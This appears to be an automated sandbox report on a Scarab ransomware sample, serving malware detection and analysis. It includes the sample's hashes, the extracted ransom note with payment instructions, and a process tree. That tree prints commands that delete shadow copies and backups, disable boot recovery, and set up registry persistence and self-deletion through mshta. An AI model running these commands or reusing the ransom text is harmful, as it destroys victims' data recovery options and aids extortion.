Resubmissions
18-07-2024 07:25
240718-h84wjs1hpb 1018-07-2024 07:19
240718-h51pqa1gng 1017-07-2024 20:55
240717-zqkhmaydmq 1017-07-2024 19:21
240717-x2pwdaycjb 10Analysis
-
max time kernel
1560s -
max time network
1563s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
-
submitted
17-07-2024 19:21
General
-
Target
Scarab.exe
-
Size
342KB
-
MD5
6899003aaa63ab4397f9e32e0a1daf43
-
SHA1
c22272ff0944d127992b393562871473b23ef8ea
-
SHA256
53f73dc2e8af9c059136029b3b535e885d4452d3375586eb9a0336d7a389aad5
-
SHA512
d8895f96e12d1b0b5907f7b1e7b976a37ff0cbe6db929cfbea5c931d905fb8269dc91bf44db83743920b63affc64ba88a0933d3111bc68f71ee266971b91b6bc
-
SSDEEP
6144:zmTLRf45/wAfqj6pjohSws+wZQtmk6LnAlnZ:eq5/tyjMLd+Rtmkc0
Score
10/10
Malware Config
Extracted
Path
C:\IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT
Ransom Note
__________________________________________________________________________________________________
| |
| *** IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS *** |
|__________________________________________________________________________________________________|
Your files are now encrypted!
-----BEGIN PERSONAL IDENTIFIER-----
pAQAAAAAAACOw7DxHZTJFYRACERTY6zIPnFz2t7beArU5fEpffP=pVuLqyf2wi9e7tkOvkavg2u+sUl3Ze08uvMKmbj7thR5dh=I
khr60b3TOzbpKIKyVqwQ9WXax4vqjfdUxel=0gZqmdI=VUU+vSqfTyPA6faq+JtPoKtnAT+fAWnh=35RjgkDfbhQDKABxALHXqOn
CJabDB4Qec6diph11BsUy57XcK0mH4yr1UFa6uGy+HLhBrxB9De=M=eP2xP+Dd74C4HMJcw2cBhVI6skPQBiB6Goc1xWuuyl2Ldq
N4khckIv9Lahaan5RwvFsslUC8eU6qY9oZ9SCXqdjuJLXV5l0WlD=5DPo9Nl93gIDhkwNpALSAxfOm2paICUbPZBcZ6debn6cVcW
VA4D97Mv4S64nghDyOiNCo7PixJ50u9MwbcyDbEBmKw37xGNpsm4dovrFGejY4YxmQVz83mJ5Upt7xHDRLkGP0CMYSBpPmefaDpO
qiIt4wsZ0IHRL4H2hT9vt06xR6jSQUQ0BxCGXj4Ix0KEmIZ5Edo85KJKQ+CfF4gt67WH2Xj2ZN8IA14RFJc8k3DfaQ8BmLn8jktZ
nCmzZAnwmGIus0sv1C3vmLNDDJiy+GisxTLvwO7B=+KmlJZaHGNJbzM5J+hKGYEflaVTE07QQuLIdvWfVeSFBoRzr8vSv4U6QUNq
ca6KM3ZWtOqXNxu2ySTOMsRzLAa0YsWdmxVmCGP4pfCb=m9YFUkvZMQZoMDnRA7sVCmfAgE5Pm7uMJBvKt4xO2bspcvNIKegEqFk
R5VKw0qA6IbNuc0ySQdSwUESS0=B+9kP9OFDQjtZIA5z
-----END PERSONAL IDENTIFIER-----
All your files have been encrypted due to a security problem with your PC.
Now you should send us email with your personal identifier.
This email will be as confirmation you are ready to pay for decryption key.
You have to pay for decryption in Bitcoins. The price depends on how fast you write to us.
After payment we will send you the decryption tool that will decrypt all your files.
Contact us using this email address: [email protected]
Free decryption as guarantee!
Before paying you can send us up to 3 files for free decryption.
The total size of files must be less than 10Mb (non archived), and files should not contain
valuable information (databases, backups, large excel sheets, etc.).
__________________________________________________________________________________________________
| |
| How to obtain Bitcoins? |
| |
| * The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click |
| 'Buy bitcoins', and select the seller by payment method and price: |
| https://localbitcoins.com/buy_bitcoins |
| * Also you can find other places to buy Bitcoins and beginners guide here: |
| http://www.coindesk.com/information/how-can-i-buy-bitcoins |
| |
|__________________________________________________________________________________________________|
__________________________________________________________________________________________________
| |
| Attention! |
| |
| * Do not rename encrypted files. |
| * Do not try to decrypt your data using third party software, it may cause permanent data loss. |
| * Decryption of your files with the help of third parties may cause increased price |
| (they add their fee to our) or you can become a victim of a scam. |
| |
|__________________________________________________________________________________________________|
Emails
Signatures
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Renames multiple (295) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Deletes itself 1 IoCs
-
Executes dropped EXE 2 IoCs
-
Loads dropped DLL 2 IoCs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Access Token Manipulation: Create Process with Token 1 TTPs 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Modifies Internet Explorer settings 1 TTPs 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 43 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Scarab.exe"C:\Users\Admin\AppData\Local\Temp\Scarab.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Scarab.exe"C:\Users\Admin\AppData\Local\Temp\Scarab.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\Scarab.exe" "C:\Users\Admin\AppData\Roaming\sevnz.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Scarab.exe"C:\Users\Admin\AppData\Local\Temp\Scarab.exe" runas3⤵
- Suspicious use of SetThreadContext
- Access Token Manipulation: Create Process with Token
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Scarab.exe"C:\Users\Admin\AppData\Local\Temp\Scarab.exe" runas4⤵
- Loads dropped DLL
- Access Token Manipulation: Create Process with Token
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\Scarab.exe" "C:\Users\Admin\AppData\Roaming\sevnz.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\sevnz.exe"C:\Users\Admin\AppData\Roaming\sevnz.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\sevnz.exe"C:\Users\Admin\AppData\Roaming\sevnz.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\mshta.exemshta.exe "javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('sevnz.exe').Path;o.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{45E73A27-D16C-4EDB-ADE8-0C069E54AF30}',i);}catch(e){}},10);"7⤵
- Adds Run key to start application
- Modifies Internet Explorer settings
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:07⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic SHADOWCOPY DELETE7⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic SHADOWCOPY DELETE8⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /All /Quiet7⤵
-
C:\Windows\SysWOW64\vssadmin.exevssadmin Delete Shadows /All /Quiet8⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled No7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c start /max notepad.exe "C:\Users\Admin\IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT"7⤵
-
C:\Windows\SysWOW64\notepad.exenotepad.exe "C:\Users\Admin\IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT"8⤵
-
C:\Windows\SysWOW64\mshta.exemshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('sevnz.exe');close()}catch(e){}},10);"7⤵
- Modifies Internet Explorer settings
-
C:\Windows\SysWOW64\mshta.exemshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('Scarab.exe');close()}catch(e){}},10);"5⤵
- Deletes itself
- Modifies Internet Explorer settings
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Access Token Manipulation
1Create Process with Token
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
MD5b15343de4ce64597d9bde395e7a642a8
SHA1ff162dba42584cd7a96093e69b13fdf52017e868
SHA2563a134d189040c9a46f7aaa2f75c86d9599ef8ab43cdb835b0e71709ea16916cc
SHA51278679b0894d999f369ed9607d68ea2d289aa750af2ecaddf0d17812380b5be2d1dccf9528cb284a7a0b9475c47fc242a24bfecb8839f8ba00ddc8e7c7daa784c
-
Filesize
342KB
MD56899003aaa63ab4397f9e32e0a1daf43
SHA1c22272ff0944d127992b393562871473b23ef8ea
SHA25653f73dc2e8af9c059136029b3b535e885d4452d3375586eb9a0336d7a389aad5
SHA512d8895f96e12d1b0b5907f7b1e7b976a37ff0cbe6db929cfbea5c931d905fb8269dc91bf44db83743920b63affc64ba88a0933d3111bc68f71ee266971b91b6bc
-
Filesize
260KB
-
Filesize
260KB
-
Filesize
260KB
-
Filesize
1024KB
-
Filesize
260KB
-
Filesize
260KB
-
Filesize
260KB
-
Filesize
260KB
-
Filesize
260KB
-
Filesize
260KB
-
Filesize
260KB
-
Filesize
260KB
-
Filesize
4KB
-
Filesize
260KB
-
Filesize
260KB
-
Filesize
260KB
-
Filesize
260KB
-
Filesize
260KB
-
Filesize
260KB
-
Filesize
260KB
-
Filesize
260KB
-
Filesize
260KB
-
Filesize
260KB
-
Filesize
260KB
-
Filesize
260KB
-
Filesize
260KB
-
Filesize
260KB
-
Filesize
260KB
-
Filesize
260KB
-
Filesize
260KB
-
Filesize
260KB
-
Filesize
260KB
-
Filesize
260KB
-
Filesize
260KB
-
Filesize
260KB
-
Filesize
260KB
-
Filesize
260KB
-
Filesize
260KB
-
Filesize
260KB
-
Filesize
260KB
-
Filesize
360KB